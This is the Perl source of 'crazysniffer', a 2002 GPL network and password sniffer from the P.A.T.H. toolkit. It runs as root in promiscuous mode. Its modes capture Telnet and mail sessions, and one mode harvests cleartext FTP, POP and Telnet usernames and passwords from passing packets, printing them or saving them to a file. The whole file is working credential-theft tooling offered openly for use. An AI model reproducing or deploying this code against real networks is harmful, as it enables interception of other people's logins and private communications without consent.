#!/usr/bin/perl
# Yet another network and password sniffer
#
# Written by Bastian Ballmann [ bytebeater@crazydj.de ]
# http://www.crazydj.de
#
# Last Update: 22.12.2002
#
# This code is licensed under the GPL

# Are you root?
if($> != 0)
{
    die "You must be root...\n\n";
}


###[ Loading modules ]###

use Net::PcapUtils;                 # Sniffin around
use NetPacket::Ethernet qw(:strip); # Decoding Ethernet packets
use NetPacket::IP qw(:strip);       # Decoding IP packets
use NetPacket::TCP;                 # Decoding TCP packets
use Data::Hexdumper;                # Dump Hex
use Getopt::Std;                    # Parsing parameter
use path::config;                   # P.A.T.H. configuration
use path::hijack;                   # P.A.T.H. hijacking stuff


###[ MAIN PART ]###

# Setting up signal event handlers
$SIG{INT} = \&save_file; 
$SIG{TERM} = \&save_file;
$SIG{KILL} = \&save_file;

# Autoflush Output
$|=1;

# Need help?
if($ARGV[0] eq "--help")
{
    print "\nUsage $0 -afFilmStwxX\n\n";
    print "[-a dump all headers options]\n";
    print "[-f pcap-expression]\n";
    print "[-F print TCP flags]\n";
    print "[-i interface]\n"; 
    print "[-l snaplen] \n";
    print "[-m mail sniffin]\n";
    print "[-S print Sequence and Acknowledgement numbers]\n";
    print "[-t telnet sniffin]\n";
    print "[-w save-to-file]\n";
    print "[-W print window-size]\n";
    print "[-x dump hex]\n";
    print "[-X password sniffin]\n\n";
    exit(0);
}

# Global variables
my ($snaplen,%sequence);
my $flag = 0;
my ($username,$password);

# Mit diesem Flag merken wir uns ob wir
# im Mail oder Telnet Modus schon die
# IPs / Ports ausgegeben haben
my %ips;

# Create config object
my $cfg = config->new();

# Load GUI version?
if($ARGV[0] eq "--gui")
{
    require "crazysniffer-gui.pl";
}
else
{
# Read in parameter
getopts('w:l:i:f:aFSmtWXx', \%args);
start();
}


###[ Subroutines ]###

sub start
{

# Parameter checken
    if($cfg->check(%args) == 1)
    {
	exit(1);
    }

# Wurde mehr als ein Sniffin Modus ausgewaehlt?
    my $count_mode = 0;

    if($args{t})
    {
	$count_mode++;
    }

    if($args{m})
    {
	$count_mode++;
    }

    if($args{X})
    {
	$count_mode++;
    }

    if($count_mode > 1)
    {
	print_error("Please choose either -m, -t or -X\n\n");
    }
    

# Pcap Filter    
    my $filter = "";

# Telnet sniffin mode
    if($args{'t'})
    {
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"Telnet sniffin mode\n\n");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print "Telnet sniffin mode\n\n";
	}

	$filter = "tcp and port 23";
    }
# Mail sniffin mode
    elsif($args{'m'})
    {
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"Mail sniffin mode\n\n");
	    $result->see(end),
	    $top->update;
	}
	else
	{
	    print "Mail sniffin mode\n\n";
	}

	$filter = "tcp and port 25 or port 110 or port 143";
    }

# Password Sniffin mode
    elsif($args{'X'})
    {
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"Password sniffin mode\n\n");
	    $result->see(end);
	    $top->update;
	}
	else
	{
	    print "Password sniffin mode\n\n";
	}

	$filter = "tcp and port 21 or port 23 or port 25 or port 110 or port 143";	
    }

# User Pcap Expression
    if($args{'f'})
    {
	if($filter eq "")
	{
	    $filter = $args{'f'};
	}
	else
	{
	    $filter .= " and $args{'f'}";
	}
    }

# Write payload to a file?
    if($args{'w'})
    {
	$output = $args{'w'};

	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"Savin output to file $output\n");
	    $result->see(end);
	    $top->update;
	}
	else
	{
	    print "Saving output to file $output\n";
	}

	open(O,">$output") || print_error("Cannot write to $output!\n$!\n");
    }
    
# Number of bytes to capture from each packet
    $snaplen = $args{'l'};

# Default Snaplen    
    if($snaplen eq "")
    {
	$snaplen = 2048;
    }

    if($ARGV[0] eq "--gui")
    {
	$result->insert('end',"Start sniffin $filter on device " . $cfg->get_device . "...\n\n");
	$result->see(end);
	$top->update();
    }
    else
    {
	print "Start sniffin $filter on device " . $cfg->get_device . "...\n\n";
    }


      Net::PcapUtils::loop(\&sniffit,
			   PROMISC => 1,
			   SNAPLEN => $snaplen,
			   FILTER => $filter,	
			   DEV => $cfg->get_device,
			   NUMPACKETS => -1) || print_error("Shit! There was an error!\n$!\n\n");
}

# Decode packets and payload
# Parse the payload
sub sniffit
{
    my ($opt, $header, $packet) = @_;

    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    my $dump = $tcp->{data};

    # GUI updaten
    $top->update if $ARGV[0] eq "--gui";
    $output_big->update if defined $output_big;

# Telnet sniffin mode
# IPs + Portnummer wird nicht angezeigt
if($args{'t'})
{
    # Wurde die IP / Port schon ausgegeben?
    unless($ips{"$ip->{src_ip}:$tcp->{src_port} $ip->{dest_ip}:$tcp->{dest_port}"})
    {
	$ips{"$ip->{src_ip}:$tcp->{src_port} $ip->{dest_ip}:$tcp->{dest_port}"} = 1;

	# Ausgabe im GUI?
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n";
	}

	# Ausgabe in Datei?
	if($args{'w'})
	{
	    print O "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n";
	}
    }

# Wurde das Paket schon verarbeitet?
    unless($sequence{$tcp->{seqnum}})
    {
	$sequence{$tcp->{seqnum}} = 1;
	$dump =~ s/\r\n/\n/g;

	# Ausgabe im GUI?
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"$dump");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print $dump;	
	}

	# Ausgabe in Datei?
	if($args{'w'})
	{
	    print O "$dump";
	}
    }
}

# Mail sniffin mode
elsif($args{'m'})
{
    # Wurde die IP / Port schon ausgegeben?
    unless($ips{"$ip->{src_ip}:$tcp->{src_port} $ip->{dest_ip}:$tcp->{dest_port}"})
    {
	$ips{"$ip->{src_ip}:$tcp->{src_port} $ip->{dest_ip}:$tcp->{dest_port}"} = 1;

	# Ausgabe im GUI?
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n";
	}

	# Ausgabe in Datei?
	if($args{'w'})
	{
	    print O "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n\n";
	}
    }

    if($ARGV[0] eq "--gui")
    {
	$result->insert(end,"$dump");
	$result->see(end);
	$top->update();
    }
    else
    {
	print $dump;
    }

    # Ausgabe in Datei?
    if($args{'w'})
    {
	print O "$dump";
    }

    if($dump =~ /QUIT/i)
    {
	if($ARGV[0] eq "--gui")
	{
	    $result->insert(end,"-=" x 40 . "\n");
	    $result->see(end);
	    $top->update();
	}
	else
	{
	    print "-=" x 40 . "\n";
	}
	
	# Ausgabe in Datei?
	if($args{'w'})
	{
	    print O "-=" x 40 . "\n";
	}	    
    }
}

# Password snffin mode
elsif($args{'X'})
{
    # FTP / POP Login
    if( ($dump =~ /PASS/) || ($dump =~ /USER/) )
    {
	print_dump($packet);
    }
    else
    {
	# Telnet Login
	if($dump =~ /Last/)
	{
	    $flag = 3;
	}
	elsif($dump =~ /login/)
	{
	    $flag = 1;
	    return;
	}
	elsif($dump =~ /Password/)
	{
	    $flag = 2;
	    return;
	}

	# Usernamen speichern
	if($flag == 1)
	{
            # Wurde das Paket schon verarbeitet?
	    if($sequence{$tcp->{seqnum}})
	    {
		return;
	    }
	    else
	    {
		$sequence{$tcp->{seqnum}} = 1;
	    }

	    chomp $dump;
	    $username .= $dump;
	}

	# Password speichern
	if($flag == 2)
	{
	    chomp $dump;
	    $password .= $dump;
	}

	# Ausgabe 
	if($flag == 3)
	{
	    $dump = "Username $username\nPassword $password\n\n";
	    print_dump($packet,$dump);
	    $flag = 0;
	    $username = "";
	    $password = "";
	}
    }
}

# Normal sniffin mode
else
{
    print_dump($packet);
}
}


# Print out packet header information
sub print_dump
{
    my($packet,$dump) = @_;
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    my $flags = "";
    
    if($dump eq "")
    {
	$dump = $tcp->{data};
    }

    my $output = "$ip->{src_ip}:$tcp->{src_port}  -->  $ip->{dest_ip}:$tcp->{dest_port}";

    # Print Sequence and Acknowledgement numbers?
    if( ($args{'S'}) || ($args{'a'}) )
    {
	$output .= " Seq: " . $tcp->{seqnum} . " Ack: " . $tcp->{acknum};
    }

    # Print TCP Flags?
    if( ($args{'F'}) || ($args{'a'}) )
    {
	if(hijack::check_flag('',$packet,"syn"))
	{
	    $flags .= "SYN ";
	}

	if(hijack::check_flag('',$packet,"ack"))
	{
	    $flags .= "ACK ";
	}
	   
	if(hijack::check_flag('',$packet,"rst"))
	{
	    $flags .= "RST ";
	}

	if(hijack::check_flag('',$packet,"fin"))
	{
	    $flags .= "FIN ";
	}

	if(hijack::check_flag('',$packet,"psh"))
	{
	    $flags .= "PSH ";
	}

	if(hijack::check_flag('',$packet,"urg"))
	{
	    $flags .= "URG ";
	}

	$output .= " Flags: $flags";
    }

    # Print Window size?
    if( ($args{'W'}) || ($args{'a'}) )
    {
	$output .= " Win: " . $tcp->{winsize};
    }


    chomp $dump;

    # Print Payload in Hex?
    if($args{'x'})
    {
	unless($dump eq "")
	{
	    $dump = Data::Hexdumper::Hexdump( data => $dump, format => "H" );
	}
    }



    # Ausgabe in eine Datei schreiben?
    if($args{'w'})
    {
	print O "$output\n";
	print O "$dump\n\n" unless ( ($dump eq "") || ($dump =~ /^\s+$/) );
    }

    # Output in GUI?
    if($ARGV[0] eq "--gui")
    {
	$result->insert('end',"$output\n");
	$result->insert('end',"$dump\n\n") unless ( ($dump eq "") || ($dump =~ /^\s+$/) );
	$result->see(end);
	$top->update();
    }
    else
    {

	print "$output\n";
	print "$dump\n\n" unless ( ($dump eq "") || ($dump =~ /^\s+$/) );
    }
}


# Dateihandle schliessen falls der Output in eine Datei
# geschrieben wird und das Programm abgebrochen wird
sub save_file
{
    if($args{'w'})
    {
	close(O);
    }

    exit(0);
}

# Print an error message
sub print_error
{
    my $error = shift;

    if($ARGV[0] eq "--gui")
    {
	show_error($error);
    }
    else
    {
	die "$error";
    }
}

###[ Thats all folks! =) ]###
